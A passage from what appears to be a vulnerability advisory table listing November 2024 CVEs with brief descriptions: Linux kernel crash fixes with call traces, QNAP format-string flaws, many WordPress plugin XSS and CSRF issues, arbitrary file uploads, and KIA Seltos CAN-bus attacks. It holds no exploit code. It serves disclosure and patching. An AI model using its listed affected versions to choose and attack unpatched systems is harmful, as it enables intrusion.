sriov_numvfs_store(). | 2024-11-19 | not yet calculated | CVE-2024-50296 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: xilinx: axienet: Enqueue Tx packets in dql before dmaengine starts Enqueue packets in dql after dma engine starts causes race condition. Tx transfer starts once dma engine is started and may execute dql dequeue in completion before it gets queued. It results in following kernel crash while running iperf stress test: kernel BUG at lib/dynamic_queue_limits.c:99! <snip> Internal error: Oops - BUG: 00000000f2000800 [#1] SMP pc : dql_completed+0x238/0x248 lr : dql_completed+0x3c/0x248 Call trace: dql_completed+0x238/0x248 axienet_dma_tx_cb+0xa0/0x170 xilinx_dma_do_tasklet+0xdc/0x290 tasklet_action_common+0xf8/0x11c tasklet_action+0x30/0x3c handle_softirqs+0xf8/0x230 <snip> Start dmaengine after enqueue in dql fixes the crash. | 2024-11-19 | not yet calculated | CVE-2024-50297 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: enetc: allocate vf_state during PF probes In the previous implementation, vf_state is allocated memory only when VF is enabled. However, net_device_ops::ndo_set_vf_mac() may be called before VF is enabled to configure the MAC address of VF. If this is the case, enetc_pf_set_vf_mac() will access vf_state, resulting in access to a null pointer. The simplified error log is as follows. root@ls1028ardb:~# ip link set eno0 vf 1 mac 00:0c:e7:66:77:89 [ 173.543315] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000004 [ 173.637254] pc : enetc_pf_set_vf_mac+0x3c/0x80 Message from sy [ 173.641973] lr : do_setlink+0x4a8/0xec8 [ 173.732292] Call trace: [ 173.734740] enetc_pf_set_vf_mac+0x3c/0x80 [ 173.738847] __rtnl_newlink+0x530/0x89c [ 173.742692] rtnl_newlink+0x50/0x7c [ 173.746189] rtnetlink_rcv_msg+0x128/0x390 [ 173.750298] netlink_rcv_skb+0x60/0x130 [ 173.754145] rtnetlink_rcv+0x18/0x24 [ 173.757731] netlink_unicast+0x318/0x380 [ 173.761665] netlink_sendmsg+0x17c/0x3c8 | 2024-11-19 | not yet calculated | CVE-2024-50298 |
| n/a -- n/a |
The CM Table Of Contents WordPress plugin before 1.2.3 does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin perform such action via a CSRF attack | 2024-11-18 | not yet calculated | CVE-2024-5030 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: HID: core: zero-initialize the report buffer Since the report buffer is used by all kinds of drivers in various ways, let's zero-initialize it during allocation to make sure that it can't be ever used to leak kernel memory via specially-crafted report. | 2024-11-19 | not yet calculated | CVE-2024-50302 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: resource,kexec: walk_system_ram_res_rev must retain resource flags walk_system_ram_res_rev() erroneously discards resource flags when passing the information to the callback. This causes systems with IORESOURCE_SYSRAM_DRIVER_MANAGED memory to have these resources selected during kexec to store kexec buffers if that memory happens to be at placed above normal system ram. This leads to undefined behavior after reboot. If the kexec buffer is never touched, nothing happens. If the kexec buffer is touched, it could lead to a crash (like below) or undefined behavior. Tested on a system with CXL memory expanders with driver managed memory, TPM enabled, and CONFIG_IMA_KEXEC=y. Adding printk's showed the flags were being discarded and as a result the check for IORESOURCE_SYSRAM_DRIVER_MANAGED passes. find_next_iomem_res: name(System RAM (kmem)) start(10000000000) end(1034fffffff) flags(83000200) locate_mem_hole_top_down: start(10000000000) end(1034fffffff) flags(0) [.] BUG: unable to handle page fault for address: ffff89834ffff000 [.] #PF: supervisor read access in kernel mode [.] #PF: error_code(0x0000) - not-present page [.] PGD c04c8bf067 P4D c04c8bf067 PUD c04c8be067 PMD 0 [.] Oops: 0000 [#1] SMP [.] RIP: 0010:ima_restore_measurement_list+0x95/0x4b0 [.] RSP: 0018:ffffc900000d3a80 EFLAGS: 00010286 [.] RAX: 0000000000001000 RBX: 0000000000000000 RCX: ffff89834ffff000 [.] RDX: 0000000000000018 RSI: ffff89834ffff000 RDI: ffff89834ffff018 [.] RBP: ffffc900000d3ba0 R08: 0000000000000020 R09: ffff888132b8a900 [.] R10: 4000000000000000 R11: 000000003a616d69 R12: 0000000000000000 [.] R13: ffffffff8404ac28 R14: 0000000000000000 R15: ffff89834ffff000 [.] FS: 0000000000000000(0000) GS:ffff893d44640000(0000) knlGS:0000000000000000 [.] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [.] ata5: SATA link down (SStatus 0 SControl 300) [.] CR2: ffff89834ffff000 CR3: 000001034d00f001 CR4: 0000000000770ef0 [.] PKRU: 55555554 [.] Call Trace: [.] <TASK> [.] ? __die+0x78/0xc0 [.] ? page_fault_oops+0x2a8/0x3a0 [.] ? exc_page_fault+0x84/0x130 [.] ? asm_exc_page_fault+0x22/0x30 [.] ? ima_restore_measurement_list+0x95/0x4b0 [.] ? template_desc_init_fields+0x317/0x410 [.] ? crypto_alloc_tfm_node+0x9c/0xc0 [.] ? init_ima_lsm+0x30/0x30 [.] ima_load_kexec_buffer+0x72/0xa0 [.] ima_init+0x44/0xa0 [.] __initstub__kmod_ima__373_1201_init_ima7+0x1e/0xb0 [.] ? init_ima_lsm+0x30/0x30 [.] do_one_initcall+0xad/0x200 [.] ? idr_alloc_cyclic+0xaa/0x110 [.] ? new_slab+0x12c/0x420 [.] ? new_slab+0x12c/0x420 [.] ? number+0x12a/0x430 [.] ? sysvec_apic_timer_interrupt+0xa/0x80 [.] ? asm_sysvec_apic_timer_interrupt+0x16/0x20 [.] ? parse_args+0xd4/0x380 [.] ? parse_args+0x14b/0x380 [.] kernel_init_freeable+0x1c1/0x2b0 [.] ? rest_init+0xb0/0xb0 [.] kernel_init+0x16/0x1a0 [.] ret_from_fork+0x2f/0x40 [.] ? rest_init+0xb0/0xb0 [.] ret_from_fork_asm+0x11/0x20 [.] </TASK> | 2024-11-19 | not yet calculated | CVE-2024-50303 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ipv4: ip_tunnel: Fix suspicious RCU usage warning in ip_tunnel_find() The per-netns IP tunnel hash table is protected by the RTNL mutex and ip_tunnel_find() is only called from the control path where the mutex is taken. Add a lockdep expression to hlist_for_each_entry_rcu() in ip_tunnel_find() in order to validate that the mutex is held and to silence the suspicious RCU usage warning [1]. [1] WARNING: suspicious RCU usage 6.12.0-rc3-custom-gd95d9a31aceb #139 Not tainted ----------------------------- net/ipv4/ip_tunnel.c:221 RCU-list traversed in non-reader section!! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 1 lock held by ip/362: #0: ffffffff86fc7cb0 (rtnl_mutex){+.+.}-{3:3}, at: rtnetlink_rcv_msg+0x377/0xf60 stack backtrace: CPU: 12 UID: 0 PID: 362 Comm: ip Not tainted 6.12.0-rc3-custom-gd95d9a31aceb #139 Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 Call Trace: <TASK> dump_stack_lvl+0xba/0x110 lockdep_rcu_suspicious.cold+0x4f/0xd6 ip_tunnel_find+0x435/0x4d0 ip_tunnel_newlink+0x517/0x7a0 ipgre_newlink+0x14c/0x170 __rtnl_newlink+0x1173/0x19c0 rtnl_newlink+0x6c/0xa0 rtnetlink_rcv_msg+0x3cc/0xf60 netlink_rcv_skb+0x171/0x450 netlink_unicast+0x539/0x7f0 netlink_sendmsg+0x8c1/0xd80 ____sys_sendmsg+0x8f9/0xc20 ___sys_sendmsg+0x197/0x1e0 __sys_sendmsg+0x122/0x1f0 do_syscall_64+0xbb/0x1d0 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2024-11-19 | not yet calculated | CVE-2024-50304 |
| n/a -- n/a |
An authorization bypass through user-controlled key vulnerability has been reported to affect Media Streaming add-on. If exploited, the vulnerability could allow local network attackers to gain privilege. We have already fixed the vulnerability in the following version: Media Streaming add-on 500.1.1.6 ( 2024/08/02 ) and later | 2024-11-22 | not yet calculated | CVE-2024-50395 |
| n/a -- n/a |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-50396 |
| n/a -- n/a |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained user access to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-50397 |
| n/a -- n/a |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-50398 |
| n/a -- n/a |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-50399 |
| n/a -- n/a |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-50400 |
| n/a -- n/a |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.1.2930 build 20241025 and later QuTS hero h5.2.1.2929 build 20241025 and later | 2024-11-22 | not yet calculated | CVE-2024-50401 |
| n/a -- n/a |
Missing Authorization vulnerability in BoldThemes Bold Page Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bold Page Builder: from n/a through 5.1.3. | 2024-11-19 | not yet calculated | CVE-2024-50417 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Beaver Builder Team Beaver Builder allows Stored XSS.This issue affects Beaver Builder: from n/a through 2.8.3.7. | 2024-11-19 | not yet calculated | CVE-2024-50430 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Post Grid Team by WPXPO PostX allows Stored XSS.This issue affects PostX: from n/a through 4.1.15. | 2024-11-19 | not yet calculated | CVE-2024-50513 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saturday Drive Ninja Forms allows Stored XSS.This issue affects Ninja Forms: from n/a through 3.8.16. | 2024-11-19 | not yet calculated | CVE-2024-50514 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saturday Drive Ninja Forms allows Stored XSS.This issue affects Ninja Forms: from n/a through 3.8.16. | 2024-11-19 | not yet calculated | CVE-2024-50515 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Adam Skaat Countdown & Clock allows Stored XSS.This issue affects Countdown & Clock: from n/a through 2.8.0.9. | 2024-11-19 | not yet calculated | CVE-2024-50516 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SlovenskoIT a.s. ID-SK Toolkit allows Stored XSS.This issue affects ID-SK Toolkit: from n/a through 1.7.2. | 2024-11-19 | not yet calculated | CVE-2024-50517 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Common Ninja Pricer Ninja allows Stored XSS.This issue affects Pricer Ninja: from n/a through 2.1.0. | 2024-11-19 | not yet calculated | CVE-2024-50518 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Visser Labs Jigoshop - Store Exporter allows Reflected XSS.This issue affects Jigoshop - Store Exporter: from n/a through 1.5.8. | 2024-11-19 | not yet calculated | CVE-2024-50519 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Peter J. Herrel Ancient World Linked Data allows DOM-Based XSS.This issue affects Ancient World Linked Data: from n/a through 0.2.1. | 2024-11-19 | not yet calculated | CVE-2024-50520 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in alleythemes Alley Elementor Widget allows DOM-Based XSS.This issue affects Alley Elementor Widget: from n/a through 1.0.7. | 2024-11-19 | not yet calculated | CVE-2024-50521 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Redy Ru WeChat Subscribers Lite allows Reflected XSS.This issue affects WeChat Subscribers Lite : from n/a through 1.6.6. | 2024-11-19 | not yet calculated | CVE-2024-50522 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jerin K Alexander Events Manager Pro - extended allows Reflected XSS.This issue affects Events Manager Pro - extended: from n/a through 0.1. | 2024-11-19 | not yet calculated | CVE-2024-50532 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in David Garcia Domain Sharding allows Stored XSS.This issue affects Domain Sharding: from n/a through 1.2.1. | 2024-11-19 | not yet calculated | CVE-2024-50533 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Syed Umair Hussain Shah World Prayer Time allows Stored XSS.This issue affects World Prayer Time: from n/a through 2.0. | 2024-11-19 | not yet calculated | CVE-2024-50534 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kyle M. Brown Step by Step allows Stored XSS.This issue affects Step by Step: from n/a through 0.4.5. | 2024-11-19 | not yet calculated | CVE-2024-50535 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Intuitive Design GDReseller allows DOM-Based XSS.This issue affects GDReseller: from n/a through 1.6. | 2024-11-19 | not yet calculated | CVE-2024-50536 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Stefano Marra Smart Mockups allows Stored XSS.This issue affects Smart Mockups: from n/a through 1.2.0. | 2024-11-19 | not yet calculated | CVE-2024-50537 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Irfan Ardiansah Show Visitor IP Address allows Stored XSS.This issue affects Show Visitor IP Address: from n/a through 0.2. | 2024-11-19 | not yet calculated | CVE-2024-50538 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DemixPress (dp) AddThis allows Stored XSS.This issue affects (dp) AddThis: from n/a through 1.0.2. | 2024-11-19 | not yet calculated | CVE-2024-50540 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Enea Overclokk Advanced Control Manager for WordPress by ItalyStrap allows Stored XSS.This issue affects Advanced Control Manager for WordPress by ItalyStrap: from n/a through 2.16.0. | 2024-11-19 | not yet calculated | CVE-2024-50541 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zach Silberstein RLM Elementor Widgets Pack allows DOM-Based XSS.This issue affects RLM Elementor Widgets Pack: from n/a through 1.3.1. | 2024-11-19 | not yet calculated | CVE-2024-50542 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Amazing Team amazing neo icon font for elementor allows DOM-Based XSS.This issue affects amazing neo icon font for elementor: from n/a through 2.0.1. | 2024-11-19 | not yet calculated | CVE-2024-50543 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Auburnforest DataMentor allows DOM-Based XSS.This issue affects DataMentor: from n/a through 1.7. | 2024-11-19 | not yet calculated | CVE-2024-50545 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Print Reach, Inc. MyOrderDesk allows DOM-Based XSS.This issue affects MyOrderDesk: from n/a through 3.2.6. | 2024-11-19 | not yet calculated | CVE-2024-50546 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themedy Themedy Toolbox allows DOM-Based XSS.This issue affects Themedy Toolbox: from n/a through 1.0.16. | 2024-11-19 | not yet calculated | CVE-2024-50547 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Abdullah Nahian Awesome Progress Bar allows DOM-Based XSS.This issue affects Awesome Progress Bar: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-50548 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bonway Services Bonway Static Block Editor allows DOM-Based XSS.This issue affects Bonway Static Block Editor: from n/a through 1.1.0. | 2024-11-19 | not yet calculated | CVE-2024-50549 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alessandro Staniscia EndomondoWP allows Stored XSS.This issue affects EndomondoWP: from n/a through 0.1.1. | 2024-11-19 | not yet calculated | CVE-2024-50551 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jason Pancake Hover Video Preview allows Stored XSS.This issue affects Hover Video Preview: from n/a through 1.0.2. | 2024-11-19 | not yet calculated | CVE-2024-50552 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Classy Addons Classy Addons for Elementor allows DOM-Based XSS.This issue affects Classy Addons for Elementor: from n/a through 1.2.7. | 2024-11-19 | not yet calculated | CVE-2024-50553 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sided Sided allows DOM-Based XSS.This issue affects Sided: from n/a through 1.4.2. | 2024-11-19 | not yet calculated | CVE-2024-50554 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MD. Mamunur Roshid WM Zoom allows DOM-Based XSS.This issue affects WM Zoom: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-50556 |
| n/a -- n/a |
An issue in Owncloud android apk v.4.3.1 allows a physically proximate attacker to escalate privileges via the PassCodeViewModel class, specifically in the checkPassCodeIsValid method | 2024-11-22 | not yet calculated | CVE-2024-50657 |
| n/a -- n/a |
The mediapool feature of the Redaxo Core CMS application v 5.17.1 is vulnerable to Cross Site Scripting(XSS) which allows a remote attacker to escalate privileges | 2024-11-19 | not yet calculated | CVE-2024-50803 |
| n/a -- n/a |
Insecure Permissions vulnerability in Micro-star International MSI Center Pro 2.1.37.0 allows a local attacker to execute arbitrary code via the Device_DeviceID.dat.bak file within the C:\ProgramData\MSI\One Dragon Center\Data folder | 2024-11-18 | not yet calculated | CVE-2024-50804 |
| n/a -- n/a |
An XML External Entity (XXE) vulnerability in the Import object and Translation Memory import functionalities of WorldServer v11.8.2 to access sensitive information and execute arbitrary commands via supplying a crafted .tmx file. | 2024-11-18 | not yet calculated | CVE-2024-50848 |
| n/a -- n/a |
A Stored Cross-Site Scripting (XSS) vulnerability in the "Rules" functionality of WorldServer v11.8.2 allows a remote authenticated attacker to execute arbitrary JavaScript code. | 2024-11-18 | not yet calculated | CVE-2024-50849 |
| n/a -- n/a |
Jpress until v5.1.1 has arbitrary file uploads on the windows platform, and the construction of non-standard file formats such as .jsp. can lead to arbitrary command execution | 2024-11-18 | not yet calculated | CVE-2024-50919 |
| n/a -- n/a |
Cross Site Scripting vulnerability in Public Knowledge Project PKP Platform OJS/OMP/OPS- before v.3.3.0.16 allows an attacker to execute arbitrary code and escalate privileges via a crafted script | 2024-11-22 | not yet calculated | CVE-2024-50965 |
| n/a -- n/a |
AVSCMS v8.2.0 was discovered to contain weak default credentials for the Administrator account. | 2024-11-18 | not yet calculated | CVE-2024-51051 |
| n/a -- n/a |
An arbitrary file upload vulnerability in the component /main/fileupload.php of AVSCMS v8.2.0 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-11-18 | not yet calculated | CVE-2024-51053 |
| n/a -- n/a |
An issue in KIA Seltos vehicle instrument cluster with software and hardware v1.0 allows attackers to cause a Denial of Service (DoS) via ECU reset UDS service. | 2024-11-22 | not yet calculated | CVE-2024-51072 |
| n/a -- n/a |
An issue in KIA Seltos vehicle instrument cluster with software and hardware v1.0 allows attackers to control or disrupt CAN communication between the instrument cluster and CAN bus. | 2024-11-22 | not yet calculated | CVE-2024-51073 |
| n/a -- n/a |
Incorrect access control in KIA Seltos vehicle instrument cluster with software and hardware v1.0 allows attackers to arbitrarily change odometer readings in the vehicle by targeting the instrument cluster through the unsecured CAN network. | 2024-11-22 | not yet calculated | CVE-2024-51074 |
| n/a -- n/a |
An issue in Audimex EE versions 15.1.20 and earlier allowing a remote attacker to escalate privileges. Analyzing the offline client code, it was identified that it is possible for any user (with any privilege) of Audimex to dump the whole Audimex database. This gives visibility upon password hashes of any user, ongoing audit data and more. | 2024-11-20 | not yet calculated | CVE-2024-51162 |
| n/a -- n/a |
A Local File Inclusion vulnerability in Vegam Solutions Vegam 4i versions 6.3.47.0 and earlier allows a remote attacker to obtain sensitive information through the print label function. Specifically, the filePathList parameter is susceptible to LFI, enabling a malicious user to include files from the web server, such as web.config or /etc/host, leading to the disclosure of sensitive information. | 2024-11-20 | not yet calculated | CVE-2024-51163 |
| n/a -- n/a |
Cross-Site Scripting (XSS) vulnerabilities in Anuj Kumar's Client Management System Version 1.2 allow local attackers to inject arbitrary web script or HTML via the search input field parameter to admin search invoice page and client search invoice page. | 2024-11-20 | not yet calculated | CVE-2024-51209 |
| n/a -- n/a |
Cross Site Scripting vulnerability in Gibbon before v.27.0.01 and fixed in v.28.0.00 allows a remote attacker to obtain sensitive information via the email parameter found in /Gibbon/modules/User Admin/user_manage_editProcess.php. | 2024-11-21 | not yet calculated | CVE-2024-51337 |
| n/a -- n/a |
An arbitrary file upload vulnerability in ModbusMechanic v3.0 allows attackers to execute arbitrary code via uploading a crafted .xml file. | 2024-11-21 | not yet calculated | CVE-2024-51364 |
| n/a -- n/a |
An arbitrary file upload vulnerability in the importSettings method of VisiCut v2.1 allows attackers to execute arbitrary code via uploading a crafted Zip file. | 2024-11-21 | not yet calculated | CVE-2024-51365 |
| n/a -- n/a |
An arbitrary file upload vulnerability in the component \Roaming\Omega of OmegaT v6.0.1 allows attackers to execute arbitrary code via uploading a crafted .conf file. | 2024-11-21 | not yet calculated | CVE-2024-51366 |
| n/a -- n/a |
An arbitrary file upload vulnerability in the component \Users\username.BlackBoard of BlackBoard v2.0.0.2 allows attackers to execute arbitrary code via uploading a crafted .xml file. | 2024-11-21 | not yet calculated | CVE-2024-51367 |
| n/a -- n/a |
MarkUs is a web application for the submission and grading of student assignments. In versions prior to 2.4.8, an arbitrary file write vulnerability accessible via the update_files method of the SubmissionsController allows authenticated users (e.g. students) to write arbitrary files to any location on the web server MarkUs is running on (depending on the permissions of the underlying filesystem). e.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application. MarkUs v2.4.8 has addressed this issue. No known workarounds are available at the application level aside from upgrading. | 2024-11-18 | not yet calculated | CVE-2024-51499 |
| n/a -- n/a |
A security agent manual scan command injection vulnerability in the Trend Micro Deep Security 20 Agent could allow an attacker to escalate privileges and execute arbitrary code on an affected machine. In certain circumstances, attackers that have legitimate access to the domain may be able to remotely inject commands to other machines in the same domain. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability locally and must have domain user privileges to affect other machines. | 2024-11-19 | not yet calculated | CVE-2024-51503 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rami Yushuvaev Clyp allows Stored XSS.This issue affects Clyp: from n/a through 1.3. | 2024-11-19 | not yet calculated | CVE-2024-51617 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Eftakhairul Islam Sticky Social Bar allows Cross Site Request Forgery.This issue affects Sticky Social Bar: from n/a through 2.0. | 2024-11-19 | not yet calculated | CVE-2024-51631 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Sam Hoe SH Slideshow allows Stored XSS.This issue affects SH Slideshow: from n/a through 4.3. | 2024-11-19 | not yet calculated | CVE-2024-51632 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in IvyCat Web Services Simple Page Specific Sidebars allows Stored XSS.This issue affects Simple Page Specific Sidebars: from n/a through 2.14.1. | 2024-11-19 | not yet calculated | CVE-2024-51633 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Webriti WordPress Themes & Plugins Shop Webriti Custom Login allows Reflected XSS.This issue affects Webriti Custom Login: from n/a through 0.3. | 2024-11-19 | not yet calculated | CVE-2024-51634 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Garmur While Loading allows Stored XSS.This issue affects While Loading: from n/a through 3.0. | 2024-11-19 | not yet calculated | CVE-2024-51635 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Z.com by GMO GMO Social Connection allows Cross-Site Scripting (XSS).This issue affects GMO Social Connection: from n/a through 1.2. | 2024-11-19 | not yet calculated | CVE-2024-51636 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Scott E. Royalty Admin SMS Alert allows Stored XSS.This issue affects Admin SMS Alert: from n/a through 1.1.0. | 2024-11-19 | not yet calculated | CVE-2024-51637 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Sanjeev Mohindra Awesome Shortcodes For Genesis allows Stored XSS.This issue affects Awesome Shortcodes For Genesis: from n/a through .8. | 2024-11-19 | not yet calculated | CVE-2024-51638 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Hints Naver Blog allows Stored XSS.This issue affects Naver Blog: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51639 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Matt Rude MDR Webmaster Tools allows Stored XSS.This issue affects MDR Webmaster Tools: from n/a through 1.1. | 2024-11-19 | not yet calculated | CVE-2024-51640 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in jcmlmorav Advanced PDF Generator allows Stored XSS.This issue affects Advanced PDF Generator: from n/a through 0.4.0. | 2024-11-19 | not yet calculated | CVE-2024-51641 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in webhostri Seo Free allows Stored XSS.This issue affects Seo Free: from n/a through 1.4. | 2024-11-19 | not yet calculated | CVE-2024-51642 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Rajan Agaskar Amazon Associate Filter allows Stored XSS.This issue affects Amazon Associate Filter: from n/a through 0.4. | 2024-11-19 | not yet calculated | CVE-2024-51643 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Sam Wilson Addressbook allows Stored XSS.This issue affects Addressbook: from n/a through 1.1.3. | 2024-11-19 | not yet calculated | CVE-2024-51644 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Themefuse ThemeFuse Maintenance Mode allows Stored XSS.This issue affects ThemeFuse Maintenance Mode: from n/a through 1.1.3. | 2024-11-19 | not yet calculated | CVE-2024-51645 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Hands, Inc e-shops allows Reflected XSS.This issue affects e-shops: from n/a through 1.0.3. | 2024-11-19 | not yet calculated | CVE-2024-51648 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Patrick Lumumba Mobilize allows Stored XSS.This issue affects Mobilize: from n/a through 3.0.7. | 2024-11-19 | not yet calculated | CVE-2024-51649 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Scott @ MyDollarPlan.com Random Featured Post allows Stored XSS.This issue affects Random Featured Post: from n/a through 1.1.3. | 2024-11-19 | not yet calculated | CVE-2024-51650 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Prem Nawaz Khan, Victor Tsaran, Ron Feathers, and Marc Kocher Skip To allows Stored XSS.This issue affects Skip To: from n/a through 2.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51652 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Mario Spinaci UPDATE NOTIFICATIONS allows Stored XSS.This issue affects UPDATE NOTIFICATIONS: from n/a through 0.3.4. | 2024-11-19 | not yet calculated | CVE-2024-51653 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in APK.Support APK Downloader allows Stored XSS.This issue affects APK Downloader: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51654 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Microkid Custom Author URL allows Stored XSS.This issue affects Custom Author URL: from n/a through 2.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51655 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in litefeel Flash Show And Hide Box allows Stored XSS.This issue affects Flash Show And Hide Box: from n/a through 1.6. | 2024-11-19 | not yet calculated | CVE-2024-51656 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Woopy Plugins SmartLink Dynamic URLs allows Stored XSS.This issue affects SmartLink Dynamic URLs: from n/a through 1.1.0. | 2024-11-19 | not yet calculated | CVE-2024-51657 |
| n/a -- n/a |
